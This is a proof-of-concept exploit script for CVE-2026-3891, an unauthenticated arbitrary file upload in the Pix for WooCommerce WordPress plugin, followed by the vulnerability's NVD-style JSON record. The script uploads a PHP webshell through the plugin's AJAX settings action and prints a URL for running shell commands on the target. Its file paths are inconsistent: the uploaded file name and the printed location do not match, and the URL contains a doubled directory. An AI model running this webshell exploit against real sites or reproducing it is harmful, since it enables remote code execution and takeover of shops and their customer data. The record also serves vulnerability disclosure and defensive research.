CVE-2026-3891

import requests import sys # CVE-2026-3891 PoC - Arbitrary File Upload in Pix for WooCommerce # Target: WordPress site with vulnerable Pix for WooCommerce plugin (<= 1.5.0) TARGET_URL = "http://target-wordpress-site.com" # Path to upload webshell UPLOAD_PATH = "/wp-content/plugins/payment-gateway-pix-for-woocommerce/uploaded_pix_file.php" # PHP webshell content webshell = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>" def exploit_file_upload(): """Exploit arbitrary file upload vulnerability""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Craft the malicious file upload request files = { 'file': ('pix_config.php', webshell, 'application/x-php') } data = { 'action': 'lkn_pix_for_woocommerce_c6_save_settings', 'setting_name': 'pix_config', 'lkn_pix_for_woocommerce_c6_setting1': webshell } try: print(f"[*] Sending exploit request to {endpoint}") response = requests.post(endpoint, data=data, files=files, timeout=30) if response.status_code == 200: print("[+] Request sent successfully") webshell_url = f"{TARGET_URL}/wp-content/{UPLOAD_PATH}" print(f"[+] Try accessing webshell at: {webshell_url}?cmd=whoami") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_file_upload()

{"cve": {"id": "CVE-2026-3891", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:10.983", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pix for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing capability check and missing file type validation in the 'lkn_pix_for_woocommerce_c6_save_settings' function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."}, {"lang": "es", "value": "El plugin Pix for WooCommerce para WordPress es vulnerable a la carga arbitraria de archivos debido a la falta de verificación de capacidades y la falta de validación del tipo de archivo en la función 'lkn_pix_for_woocommerce_c6_save_settings' en todas las versiones hasta la 1.5.0, inclusive. Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor del sitio afectado, lo que podría posibilitar la ejecución remota de código."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/payment-gateway-pix-for-woocommerce/tags/1.4.0/Includes/LknPaymentPixForWoocommercePixC6.php#L694", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3480639/payment-gateway-pix-for-woocommerce#file56", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/20188fd3-c330-4c76-912b-72731e14c450?source=cve", "source": "[email protected]"}]}}